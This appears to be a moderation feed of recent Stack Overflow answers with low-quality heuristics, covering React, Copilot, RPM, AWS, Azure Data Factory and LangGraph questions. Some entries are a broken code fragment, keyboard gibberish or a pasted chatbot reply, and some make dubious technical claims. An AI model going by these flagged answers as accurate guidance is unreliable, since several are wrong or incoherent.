79756002

Date: 2025-09-04 16:53:34
Score: 0.5
Natty:
Report link

import React from "react";

)

)}

</section>

{/* Booking Flow Mockups */}

<section className="p-10 bg-white">

<h2 className="text-2xl font-bold text-gray-800 mb-6 text-center">

Booking Flow Mockup

</h2>

<div className="grid md:grid-cols-3 gap-6">

<Card className="rounded-2xl shadow-md">

<CardContent className="p-6 text-center">

<h3 className="font-semibold text-lg">Search Results</h3>

<p className="text-gray-500">Display flights & hotels with filters and pricing</p>

<Button className="mt-4 rounded-2xl bg-blue-500 text-white">Select Option</Button>

</CardContent>

</Card>

<Card className="rounded-2xl shadow-md">

<CardContent className="p-6 text-center">

<h3 className="font-semibold text-lg">Booking Details</h3>

<p className="text-gray-500">Enter passenger info and preferences</p>

<Button className="mt-4 rounded-2xl bg-green-500 text-white flex items-center gap-2">

<FileText className="w-4 h-4" /> Continue

</Button>

</CardContent>

</Card>

<Card className="rounded-2xl shadow-md">

<CardContent className="p-6 text-center">

<h3 className="font-semibold text-lg">Payment Gateway</h3>

<p className="text-gray-500">Secure checkout with multiple payment options</p>

<Button className="mt-4 rounded-2xl bg-purple-600 text-white flex items-center gap-2">

<CreditCard className="w-4 h-4" /> Pay Now

</Button>

</CardContent>

</Card>

</div>

</section>

{/* Back Office Dashboard Mockup */}

<section className="p-10 bg-gray-50">

<h2 className="text-2xl font-bold text-gray-800 mb-6 text-center">

Admin Back Office Dashboard

</h2>

<div className="grid md:grid-cols-3 gap-6">

<Card className="rounded-2xl shadow-md">

<CardContent className="p-6">

<h3 className="font-semibold text-lg">Reservations</h3>

<p className="text-gray-500">Manage bookings and cancellations</p>

</CardContent>

</Card>

<Card className="rounded-2xl shadow-md">

<CardContent className="p-6">

<h3 className="font-semibold text-lg">Customers</h3>

<p className="text-gray-500">View and manage customer profiles</p>

</CardContent>

</Card>

<Card className="rounded-2xl shadow-md">

<CardContent className="p-6">

<h3 className="font-semibold text-lg">Reports & Invoices</h3>

<p className="text-gray-500">Generate detailed business reports</p>

</CardContent>

</Card>

</div>

</section>

</div>

);

}

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Huntting 28

79755999

Date: 2025-09-04 16:50:33
Score: 1.5
Natty:
Report link

On running Github Copilot: Collect Diagnostics (Ctrl+Shift+P) in VSCode, I found out that another account was being used. What worked for me was signing out of this account that did not have Pro subscription. My personal account has it and I signed in again using that. Now, copilot is using that account itself. You might have only one account connected, but github copilot might be connected to another one that you might have possibly used before.

Reasons:
  • Whitelisted phrase (-1): worked for me
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Khushi

79755990

Date: 2025-09-04 16:44:31
Score: 4
Natty:
Report link

Is the issue resolved, if not i have a fix i no have modified the plugin

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Starts with a question (0.5): Is the is
  • Low reputation (1):
Posted by: Geetam Singh

79755988

Date: 2025-09-04 16:41:30
Score: 1.5
Natty:
Report link

Have you tried a small delay (100-200ms) as it's simple and effective. The delay gives the spinner time to start its animation cycle before the main thread gets busy with the activity transition.

Reasons:
  • Whitelisted phrase (-1): Have you tried
  • Low length (0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: LastCode

79755987

Date: 2025-09-04 16:40:27
Score: 1.5
Natty:
Report link

Your query is correct — the mismatch is in data type of the nested _id.
Make sure your schema and query use the same type (ObjectId vs string).

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Tejasmita

79755980

Date: 2025-09-04 16:34:25
Score: 1.5
Natty:
Report link

When the compiler reaches the code for your for-loop, it replaces the function call absdiff(x0, x1) with the code inside of the function. The while-loop code, on the other hand, introduces some overhead because the program has to create a public activation record (PAR) for the function call, add it to the runtime stack, execute the function, return the values, and finally remove the public activation record (PAR) from the stack. Because of the added functionality that occurs when you run the while-loop, the resulting function calls take longer to execute.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Starts with a question (0.5): When the
  • Low reputation (0.5):
Posted by: TTCUSM

79755974

Date: 2025-09-04 16:28:23
Score: 0.5
Natty:
Report link

Sending emails from a website is always a giant pain. The current internet email environment has taken drastic measures to prevent spam, and as a result it's pretty hard to just send an email and expect it to get delivered.

A lot of times the emails are getting flagged as spam. Have the site owner check his spam box. If it has your emails then get him to un-spam them and go back to your setup when he was getting the emails. If they are totally blocked, you can also try one of the online services that check the spamminess of your emails. They will recommend you add dkim records and do other stuff, but a lot of times that's a moving target and still not a guarantee that your emails will go where they need to go.

Using Google or Office 365 can help, but they have rate limits on how many emails you can send per hour and if your site gets a lot of traffic this can become a bottleneck. I have had some success using SendGrid, but you have to pay for an account (https://github.com/sendgrid/smtpapi-php).

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: The Dog

79755961

Date: 2025-09-04 16:18:20
Score: 0.5
Natty:
Report link

Maybe the issue is in the endpoint you are using for the "check_duplicate" function.

Inside of that one you are hitting whatever.api/auth/ and sending { 'email':'[email protected]'}. It seems very likely that the check duplicates endpoint is something like whatever.api/auth/check-duplicates.

If the endpoint is wrong, then you would get probably a 404 error which through your handle api error logic would generate a service authentication error. The code then displays this on the email and phone fields because it gets called on each one which is what you are seeing.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: The Dog

79755955

Date: 2025-09-04 16:10:17
Score: 1
Natty:
Report link

I came back to this a few months later and was able to internalize the details in the RPM dependency generator docs better. I'm not sure if this will ever help anyone else, but here is what I found.

In the /usr/lib/rpm/fileattrs/ directory there are a bunch of .attr files that define macros that are used during rpmbuild's process.

I'll use the elf.attr file for reference.

The %__elf_magic macro provides a regular expression to match what files to apply the %__elf_requires and other macros in the elf.attr file to.

The executable set in the %__elf_requires macro will get its list of files on stdin (not as normal arguments to a bash script).

In my case, I need to modify what goes into the RPM's Requires field. That is what the elf.attr's %__elf_requires does.

One possibility is to create my own mygenerator.attr file with %__mygenerator_requires /usr/bin/my-custom-script. I'm not 100% sure where to place this .attr file, I don't necessarily want to install it in the same dir as the others.

Another option is to "override" the %__elf_requires macro in my spec file templates to something like %define __elf_requires /usr/bin/my-custom-script.

Since what I want to do is tweak what the elf.attr does for Requires, this is most likely the thing I will do.

I'm open to suggestions though.

Reasons:
  • Blacklisted phrase (0.5): I need
  • RegEx Blacklisted phrase (1): I want
  • Long answer (-1):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Joel

79755951

Date: 2025-09-04 16:08:16
Score: 1
Natty:
Report link

In 2025 for AL2023, according to AWS docs:

You can optionally install the cronie package to use classic cron jobs.

Run:

sudo yum install cronie

Then crontab works again:

crontab -e
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (0.5):
Posted by: t1maccapp

79755949

Date: 2025-09-04 16:06:15
Score: 3.5
Natty:
Report link

I had the same issue and I followed the ai slop but it did not work but this documentation from aws solved my issue.

<a href="https://aws.amazon.com">Amazon Web Services</a>

To disable click tracking for that link, modify it to resemble the following:

<a ses:no-track href="aws.amazon.com">Amazon Web Services</a>

https://repost.aws/questions/QUedyox5XNRb6wgWSCSJQVow/disable-the-img-open-click-tracker-in-ses-emails#:~:text=%3Ca%20href%3D%22https%3A//aws.amazon.com,com%22%3EAmazon%20Web%20Services%3C/a%3E

Reasons:
  • Blacklisted phrase (1): this document
  • Blacklisted phrase (1): did not work
  • Whitelisted phrase (-1): I had the same
  • Probably link only (1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: PST

79755933

Date: 2025-09-04 15:46:09
Score: 4.5
Natty: 5
Report link

same question here after so many years, still not resolved. it is a wildfly..

Reasons:
  • RegEx Blacklisted phrase (1): same question
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Saragon

79755909

Date: 2025-09-04 15:25:03
Score: 4.5
Natty:
Report link

I actually found exactly what I am looking for, just 2 days after asking this question here - its FullWindowOverlay component from react-native-screens (https://github.com/software-mansion/react-native-screens).

Im gonna leave this question as is in case it helps somebody else.

Reasons:
  • Blacklisted phrase (2): I am looking for
  • Low length (0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: mmorosavljevic

79755908

Date: 2025-09-04 15:25:03
Score: 4
Natty:
Report link

textвавfkoslkf,slokfslo,kfoskf

Reasons:
  • Low length (2):
  • Has code block (-0.5):
  • Unregistered user (0.5):
  • Has no white space (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: ууу

79755906

Date: 2025-09-04 15:24:02
Score: 0.5
Natty:
Report link

It should be 256 bytes.

From ARM

The C++ 17 specification has two defined parameters relating to the granularity of memory that does not interfere. For generic software and tools, Arm will set the hardware_destructive_interference_size parameter to 256 bytes and the hardware_constructive_interference_size parameter to 64 bytes.

https://developer.arm.com/documentation/ddi0601/2025-06/AArch64-Registers/CCSIDR-EL1--Current-Cache-Size-ID-Register

For LLVM, it's here

Before this change, we would set this to Clang's default of {64, 64}. Now, we explicitly set it to {256, 64} which matches our ARM behavior for ARMv8 targets and GCC's behavior for AArch64 targets.

https://github.com/llvm/llvm-project/commit/bce2cc15133a1458e4ad053085e58c7423c365b4

* this is not in Xcode 26(LLVM 19.1.5) yet, it needs LLVM 21.1.0

For GCC, it's already been there for 4 years

He proposed 64/128 for generic AArch64, but since the A64FX now has a 256B cache line, I've changed that to 64/256.

https://github.com/gcc-mirror/gcc/commit/76b75018b3d053a890ebe155e47814de14b3c9fb

* "He" refers to JF Bastien, author of https://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0154r1.html

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Trout.Z

79755905

Date: 2025-09-04 15:23:01
Score: 4
Natty:
Report link

I was able to solve my problem through this post: Container creation error in Github codespace using a repo forked from microsoft learn

I just added "-bullseye" to .devcontainer/Dockerfile.

and updating the Agent URL to https://download.agent.dev.azure.com as what suggested by user31188334

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Amai Zaregoto

79755902

Date: 2025-09-04 15:21:01
Score: 2
Natty:
Report link

Well, I'm dumb. What happened: I'm using VS, which also comes with a vcpkg installation (that I had enabled, for testing). And I believe that this installation was used to fetch packages from github, but was an older installation and did not allow packages from the specified git commit. And it returned the misleading "<package> does not exist".

So the solution for me was to point the VCPKG_ROOT enviroment variable to the proper vcpkg installation directory (you can do this by setting "environment" inside CMakePresets) ... and now it works. Thanks everyone for trying to help!

Reasons:
  • Blacklisted phrase (0.5): Thanks
  • Long answer (-0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: Equations

79755899

Date: 2025-09-04 15:19:00
Score: 0.5
Natty:
Report link

The blanks in the Decomposition Tree visual typically represent null or missing values in the dimension field being used for analysis (in this case, income level from the DimCustomer table). Even though there are no orders without a CustomerKey in FactInternetSales, the income field (YearlyIncome) for some associated customers might still contain nulls, causing orders from those customers to appear under the "(blank)" category.To confirm:

The 600 customers without orders are unrelated here—they don't contribute to the visual because there are no orders from them to decompose. The visual only breaks down existing orders (totaling 25,164), so the blank specifically ties to orders where the customer's income is unspecified. If you've confirmed no nulls across the entire dataset (including YearlyIncome), double-check the data model relationships or any filters/bins applied to the income field. If nulls exist in YearlyIncome, consider replacing them with a placeholder like "Unknown" in Power Query to avoid the blank category.

Reasons:
  • Long answer (-1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Ryan H

79755895

Date: 2025-09-04 15:18:00
Score: 1.5
Natty:
Report link

The libcurl library documetation says it:

Using CURLOPT_POSTFIELDS implies setting CURLOPT_POST to 1.

See https://curl.se/libcurl/c/CURLOPT_POSTFIELDS.html

PHP uses libcurl library

PHP supports libcurl, a library created by Daniel Stenberg,

See https://www.php.net/manual/en/intro.curl.php

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Sergey Beloglazov

79755887

Date: 2025-09-04 15:11:58
Score: 3.5
Natty:
Report link

There is also QCOM-TEE Library. It provides an interface for communication to the Qualcomm® Trusted Execution Environment (QTEE) via the QCOM-TEE driver registered with the Linux TEE subsystem. Does this fit your use-case?

It's available on GitHub here: https://github.com/quic/quic-teec

Reasons:
  • Probably link only (1):
  • Low length (0.5):
  • No code block (0.5):
  • Contains question mark (0.5):
  • Low reputation (1):
Posted by: Daniel Schaffrath

79755886

Date: 2025-09-04 15:11:58
Score: 1.5
Natty:
Report link

Microsoft has now posted an acknowledgement of this issue here:
https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-24H2#3652msgdesc

They are working on a fix and have a known issue rollback available for organizations that have a support contract. They don't specifically mention UAC Patching or whether existing patches built with the same cert will work as before nor do they give a specific timeframe when more information will be available.

Reasons:
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: DSway

79755884

Date: 2025-09-04 15:10:57
Score: 1
Natty:
Report link

I have encountered the same problem. While training an XGBoost model.
So here are couple of things which are worth giving a try:

Step 1: As mentioned earlier -
Use Anaconda Package > Download package (sklearn, xgboost) > Save
Note : Without clicking save, it won't install or uninstall the package.

Step 2 : After installing the packages > Restart your session
Note : Sometimes your session don't pick the installed package. So you need to restart your session.

Session Restart

Step 3: Verify the installed packages under Packages option. Also, there is an environment.yml file, under the files section.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Curio Coder

79755882

Date: 2025-09-04 15:09:57
Score: 0.5
Natty:
Report link

I haven't been able to find any documentation on how to implement that kind of chunked response on Cloud Run. That could be an intended behavior of how Cloud Run handles responses in the first place. Additionally, in the case of chunked transfer encoding, the Google Front End (GFE) is configured to remove the Transfer-Encoding header from responses served by Cloud Run applications, as the GFE itself buffers the response data before forwarding it to the client.

You could also consider submitting an issue report to Google's public issue tracker for Cloud Run. This would allow the Cloud Run engineering team to also look into it and potentially offer alternative solutions. Be aware, however, that there is no guaranteed timeline for a response.

You can also take a look at this Google Cloud blog about Cloud Run's support for streaming.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: HerPat

79755872

Date: 2025-09-04 14:54:53
Score: 3
Natty:
Report link

I have opened an issue on Locust's Github and they fixed this in this PR

Reasons:
  • Low length (1.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: ale

79755859

Date: 2025-09-04 14:40:49
Score: 2.5
Natty:
Report link

I replaced every things like 2_dp in the code by 2.0_dp as suggested by PierU and now the results match.

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: FORTRAN_victim

79755847

Date: 2025-09-04 14:34:47
Score: 2
Natty:
Report link

See this article on Medium for step-by-step instructions:
MFE Angular Host with React Remote using Nx

Here is the complete source code for MFE Angular Host with React Remote Using Nx

This MFE example has an Angular Host with two Angular Remotes and one React Remote MFE. Uses the latest syntax for Angular 20 and React 19.

Reasons:
  • Blacklisted phrase (1): this article
  • Low length (0.5):
  • No code block (0.5):
Posted by: JC Lango

79755844

Date: 2025-09-04 14:26:45
Score: 2
Natty:
Report link

Thank you for posting query in Microsoft stack overflow Platform.

You are observing unexpected behaviour in the number of records returned by the REST API when calling it through Azure Data Factory (ADF), especially with larger pagination sizes. Specifically:

When using size=100, the user gets 102 or 103 records in the sink (instead of 100 as expected).

When using size=75 or size=50, the user gets the exact count (75 or 50) in the sink, as expected.

This inconsistency in the number of records returned is causing issues with downstream pipeline logic

Following are possibilities that may cause the issue

API response -

The API might include additional metadata or wrapper information (such as pagination information, total record count, etc.) within the response body. For example, a single API call might return 100 records and 2 additional metadata records, causing the total to be 102. The same happens for size=200, returning 204 records.

Cache Sink Behaviour –

Cache Sink might be writing extra records when writing results to memory. This might be due to: -

If ADF retrieves partial records from the API and stores them in the cache, the total count might increase unexpectedly.

If there is also an alignment problem with the data flow as handled by the ADF (e.g., the schema is not correct or the partitioning does not correct), the records might get written repeatedly, hence duplicates.

In addition to the above updates, I would encourage you to check below link where different ways of pagination explained with detailed steps. Kindly choose any approach from there which better fits for you.

Regards,
Vrishabh

Reasons:
  • Blacklisted phrase (0.5): Thank you
  • Blacklisted phrase (1): Regards
  • Long answer (-1):
  • No code block (0.5):
  • Low reputation (1):
Posted by: VRISHABHANATH PATIL

79755835

Date: 2025-09-04 14:21:43
Score: 2.5
Natty:
Report link

You need to use maxProperties according to SPEC: https://swagger.io/docs/specification/v3_0/data-models/data-types/

Reasons:
  • Probably link only (1):
  • Low length (1.5):
  • Has code block (-0.5):
  • Single line (0.5):
Posted by: Hollerweger

79755828

Date: 2025-09-04 14:11:40
Score: 3
Natty:
Report link

Since json is a part of the syntax (i.e. 'is json' 'is not json'), a column name json seems to irritate the sql parser with the result of not identifiyng one ? as parameter

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Ends in question mark (2):
  • Single line (0.5):
  • High reputation (-1):
Posted by: Turo

79755822

Date: 2025-09-04 14:07:39
Score: 3
Natty:
Report link

I was able to do this by creating the process group when starting the process and used CTRL_BREAK_EVENT when terminating the process.

You can see the sample code in below thread:

https://stackoverflow.com/a/79755815/5979669

Reasons:
  • Blacklisted phrase (1): stackoverflow
  • Low length (1):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: Pallav

79755814

Date: 2025-09-04 14:03:38
Score: 1
Natty:
Report link

I had queue:work running all the time.
After testing with $user->notifyNow(new SystemNotification('Test push'));
I restarted queue:work and it started working out of nowhere.
I still don't know why that was the fix...

Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: Keygun2k1

79755811

Date: 2025-09-04 14:02:37
Score: 0.5
Natty:
Report link

Why not define a format and attach it to the variable VAR2?

proc format ;
  value $miss ' ' = 'Missing';
run;

PROC TABULATE DATA=XX missing ;
  CLASS var1 var2;
  TABLES var2, var1 / nocellmerge misstext = "0";
  format var2 $miss8.;
RUN;
Reasons:
  • Low length (0.5):
  • Has code block (-0.5):
  • Ends in question mark (2):
  • Starts with a question (0.5): Why not
  • High reputation (-2):
Posted by: Tom

79755793

Date: 2025-09-04 13:50:34
Score: 0.5
Natty:
Report link

Try to check your IAM roles, you might not have the correct IAM roles(viewer only) that will make those buttons active. Project and region can also cause this, if possible try to set the region to us-central1 (this is the default supported region for Studio). Some regions are not yet supported/rolled out to some features.

Google AI Studio runs via Google Cloud behind, if you don’t have the right permissions, you can’t fully use the associated tools with it.

It can also be the Billing account, your billing account might not be linked to the project you are working on, try to double check it.</body></html>

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: marky

79755792

Date: 2025-09-04 13:49:34
Score: 1
Natty:
Report link

You can use style overrides to hide the icon

@include mat.chips-overrides(
    (
      with-avatar-avatar-size: 0px,
    )
  );

You can check all overrides here https://material.angular.dev/components/chips/styling

Reasons:
  • Whitelisted phrase (-1.5): You can use
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Madalena Ventura

79755789

Date: 2025-09-04 13:46:33
Score: 1.5
Natty:
Report link

Yes, license is needed.

// Previous
services.AddAutoMapper(typeof(Program));

// Current
services.AddAutoMapper(cfg => cfg.LicenseKey = "<License Key Here>", typeof(Program));
Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Low reputation (1):
Posted by: Andrej Bočkaj

79755782

Date: 2025-09-04 13:37:31
Score: 0.5
Natty:
Report link

the issue was that the function that myscript.py was calling was not returning the value needed by xcom.

further, the xcom needed to be assigned to a variable
`xcomvar = '{{ ti.xcom_pull(task_ids="1st_taskid_str" }}'

then using that in the bash operator

bash_command=f"python secondscript.py --dag_id '{dag.dag_id}' \
                            --task_id '{2nd_task_id}' --dag_conf configuration_string --file {xcomvar}'"
Reasons:
  • Has code block (-0.5):
  • Self-answer (0.5):
  • Low reputation (0.5):
Posted by: BMac

79755778

Date: 2025-09-04 13:34:30
Score: 3
Natty:
Report link

Within GA you go to: admin>BigQuery links -> (select your app) -> configure data stream and events ->Events to exclude -> remove ad_impression and whatever other events you want to include from there.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Alex

79755777

Date: 2025-09-04 13:32:29
Score: 1.5
Natty:
Report link

Your any class need to contain a pointer to std::type_info to ensure type safety. You can refer to my full implementation of std::any Here .

Reasons:
  • Low length (1):
  • Has code block (-0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: El Mismo Sol

79755770

Date: 2025-09-04 13:27:27
Score: 2
Natty:
Report link

I have just found the exact same issue on a L series part.

changed

HAL_UARTEx_ReceiveToIdle_DMA(&hlpuart1, RxBuf, RxBuf_Size);

Remove DMA settings entry in .ioc file.

to

HAL_UARTEx_ReceiveToIdle_IT(&hlpuart1, RxBuf, RxBuf_Size);

All now works as expected.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (1):
Posted by: Paul S

79755757

Date: 2025-09-04 13:09:23
Score: 1
Natty:
Report link

The problem and solution are both in the message you posted. You opened this post saying that it doesn't work under Python 3.13 on Windows, but your error message says that you're running 3.14. It's not that pystray will never support that version of Python; it's that pystray doesn't yet support that version of Python. Unless you're using some other module that needs the bleeding edge of Python, you can solve this by staying a couple versions behind (like 3.12) until everything else you need in your app catches up to 3.13. Then you can upgrade your app to use 3.13, and so on.

Reasons:
  • Long answer (-0.5):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (0.5):
Posted by: monachus

79755743

Date: 2025-09-04 12:54:19
Score: 2
Natty:
Report link

I noted to Visual Studio Code opens in WSL directly in WSL terminal, de WSL extension should be added in the `Profile (Default)`.

enter image description here

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • High reputation (-1):
Posted by: molavec

79755733

Date: 2025-09-04 12:47:17
Score: 1
Natty:
Report link
    if ($PSBoundParameters.Count -eq 0) {
        Get-Help $MyInvocation.MyCommand.Name
        return
    }

Previous answers use $MyInvocation.MyCommand.Definition and it doesn't work for me

Reasons:
  • RegEx Blacklisted phrase (2): doesn't work for me
  • Low length (0.5):
  • Has code block (-0.5):
  • High reputation (-1):
Posted by: Catalin DICU

79755731

Date: 2025-09-04 12:46:17
Score: 5
Natty: 5
Report link

полагаю ответ уже не актуален,но могу предположить,что у Вас не установлена или установлена не та декодировка из base64.У меня была установлена utf-8,я получил ту же ошибку,но когда сменил на ascii всё получилось.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Single line (0.5):
  • No latin characters (2):
  • Low reputation (1):
Posted by: Александр

79755729

Date: 2025-09-04 12:44:16
Score: 4
Natty:
Report link

According to their documentation , there is a lifespan for the token .
check whereas you're recreating the token once again , when on making a charge
https://developer.intuit.com/app/developer/qbpayments/docs/workflows/create-tokens#:~:text=Tokens%20have%20a%2015%20min%20lifespan

Reasons:
  • Probably link only (1):
  • Low length (1):
  • No code block (0.5):
  • Unregistered user (0.5):
  • Low reputation (1):
Posted by: anand raj

79755728

Date: 2025-09-04 12:43:15
Score: 3.5
Natty:
Report link

The problem was that vscode uses Gradle version 8.8.0, and I generated the wapper files from Gradle version 9.0.0.

Bottom line: The Gradle extension for vscode did not work due to version incompatibilities.

Reasons:
  • Blacklisted phrase (1): did not work
  • Low length (0.5):
  • No code block (0.5):
  • Self-answer (0.5):
  • Low reputation (1):
Posted by: ToshiNamura

79755724

Date: 2025-09-04 12:41:15
Score: 3
Natty:
Report link

Poked at this, made it work by setting DYNAMIC_DRAW for the buffer usage and using MAP_WRITE | MAP_READ instead of READ_WRITE for the mapping

Reasons:
  • Low length (1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Ved_s

79755712

Date: 2025-09-04 12:32:12
Score: 1.5
Natty:
Report link

For me the issue was due to the use of SafeArea over GestureDetector which was inside Stack.
I was able to resolve the issue by removing the SafeArea and adding padding using MediaQuery.of(context).viewPadding.top.

Reasons:
  • Low length (0.5):
  • No code block (0.5):
  • Low reputation (0.5):
Posted by: user10061998

79755708

Date: 2025-09-04 12:27:10
Score: 1.5
Natty:
Report link

عالیه 🌟
خب حالا برات یک نسخه طلایی‌تر و تزئینی‌تر آماده کردم. همین کار قبلی رو انجام بده (کپی → ذخیره به‌صورت flag.html → باز کن با Chrome).


کد نسخه سلطنتی‌تر:

<!doctype html>
<html lang="fa">
<meta charset="utf-8">
<title>پرچم هنری شیر و خورشید</title>
<body style="margin:0;display:flex;justify-content:center;align-items:center;height:100vh;background:#fdf8e6">
<svg viewBox="0 0 700 450" xmlns="http://www.w3.org/2000/svg">
  <!-- پس‌زمینه با قاب طلایی -->
  <rect x="10" y="10" width="680" height="430" rx="20" fill="#fff8dc" stroke="#b8860b" stroke-width="12"/>
  
  <!-- خورشید با پرتو -->
  <circle cx="180" cy="200" r="70" fill="#f6d36b" stroke="#b8860b" stroke-width="5"/>
  <!-- پرتوهای ساده -->
  <g stroke="#d4af37" stroke-width="6">
    <line x1="180" y1="100" x2="180" y2="40"/>
    <line x1="180" y1="300" x2="180" y2="360"/>
    <line x1="80" y1="200" x2="20" y2="200"/>
    <line x1="280" y1="200" x2="340" y2="200"/>
    <line x1="120" y1="120" x2="80" y2="80"/>
    <line x1="240" y1="120" x2="280" y2="80"/>
    <line x1="120" y1="280" x2="80" y2="320"/>
    <line x1="240" y1="280" x2="280" y2="320"/>
  </g>
  
  <!-- بدن شیر -->
  <rect x="320" y="230" width="200" height="70" rx="20" fill="url(#gold)" stroke="#8c6b00" stroke-width="5"/>
  <!-- سر شیر -->
  <circle cx="520" cy="230" r="40" fill="url(#gold)" stroke="#8c6b00" stroke-width="5"/>
  
  <!-- دم شیر -->
  <path d="M320 250 q-60 -20 -80 40 q20 50 80 30" fill="none" stroke="#8c6b00" stroke-width="8" stroke-linecap="round"/>
  
  <!-- شمشیر -->
  <line x1="420" y1="230" x2="420" y2="100" stroke="#c0c0c0" stroke-width="12"/>
  <circle cx="420" cy="90" r="10" fill="#d4af37" stroke="#8c6b00" stroke-width="3"/>
  <rect x="400" y="220" width="40" height="12" rx="4" fill="#d4af37" stroke="#8c6b00" stroke-width="3"/>
  
  <!-- تعریف طلایی -->
  <defs>
    <linearGradient id="gold" x1="0" y1="0" x2="1" y2="1">
      <stop offset="0%" stop-color="#ffd700"/>
      <stop offset="50%" stop-color="#daa520"/>
      <stop offset="100%" stop-color="#b8860b"/>
    </linearGradient>
  </defs>
</svg>
</ flag.html می‌خوای بعد از این نسخه
Reasons:
  • Long answer (-1):
  • Has code block (-0.5):
  • No latin characters (2):
  • Low reputation (1):
Posted by: ღAmirـ٨ـہـFarnosh

79755707

Date: 2025-09-04 12:26:10
Score: 2
Natty:
Report link

Me - Prior Cascadia font problem. Windows 10, the newer devices interface to "font" , any interaction with Cascadia just crashes setup. Many random keystrokes on my part on clearing fonts, initially from c:\Windows\Fonts & later from c:\Users\..\AppData\Local\Microsoft\Windows\Fonts ( files open by foo , at one point I couldn't even find what had my file open, the tool I was using unhelfully said "the system" and/or some other fairy that isn't a real thing. Symptom: Windows 10. Fresh install of vs2022 "free version", on a system that has had vs before , that does have vscode , that does have microsoft terminal, most likely way of removing stuff is via the BCU tool. I load vs2022 c/o I happen to like the interface to Anaconda Python install c/o the way it interacts with the standard Python debugger. ( I ask ChatGPT to write some code, my prose is very long, prior art - I have zero expectation of the code presented doing what I want & if I debug by "print to stdout", I will get bored very quickly. What I get is vs being able to run a python script but the editor just isn't , nothing displayed, no ability to edit, just a tab saying my python file name and a message saying Cascadia Code isn't being used .. and a fib that some other font is being used. ( I don't remember the other font ). Google -> no clues. ChatGPT - a whole bunch of suggestions, all could be genuine, none got me any further. So ... interaction with settings and Cascadia Code crashed settings , any attempt to reinstall italic variants of Cascadia appeared to go into infinite loops ~ leave settings @ 100% of a single thread, go for coffee, go to the shops, come back , still 100% of a single CPU , force a stop of settings, repeat , pull hair out ..

Reasons:
  • RegEx Blacklisted phrase (1): I want
  • Long answer (-1):
  • No code block (0.5):
  • Single line (0.5):
  • Low reputation (1):
Posted by: Roy Evans

79755703

Date: 2025-09-04 12:25:09
Score: 4.5
Natty:
Report link

If you see similar error when using async aiokafka:
RuntimeError: Compression library for lz4 not found

Install those two packages: pip install lz4 cramjam

For details see here:
https://github.com/aio-libs/aiokafka/blob/master/aiokafka/codec.py#L29

Reasons:
  • Probably link only (1):
  • Low length (1):
  • Has code block (-0.5):
  • Me too answer (2.5): see similar error
  • Low reputation (0.5):
Posted by: Tomasz Hławiczka

79755698

Date: 2025-09-04 12:20:08
Score: 1.5
Natty:
Report link

We can simply use the command-update method to do this. This is the basic example how it can be implemented.


from langgraph.types import Command
@tool
def send_otp(
    phone_number: str,
    tool_call_id: Annotated[str, InjectedToolCallId],
) -> Command:
    """Send OTP to the (already validated) phone number."""
    logger.info("-----------------------------------send_otp-----------------------------------")

    formatted_number = phone_number
    otp_code = OTPService().generate_otp()
    # In production, actually send SMS here:
    # OTPService().send_otp(formatted_number, otp_code)

    payload = {
        "otp": otp_code,  # stored in state; avoid showing to user in production
        "phoneNumber": formatted_number,
        "message": f"OTP sent successfully to {formatted_number}. Please check your phone.",
    }
    logger.info(f"Send OTP tool payload: {payload}")

    return Command(
        update={
            "otp": otp_code,
            "phoneNumber": formatted_number,
            "messages": [
                ToolMessage(content=json.dumps(payload), tool_call_id=tool_call_id)
            ],
        }
    )

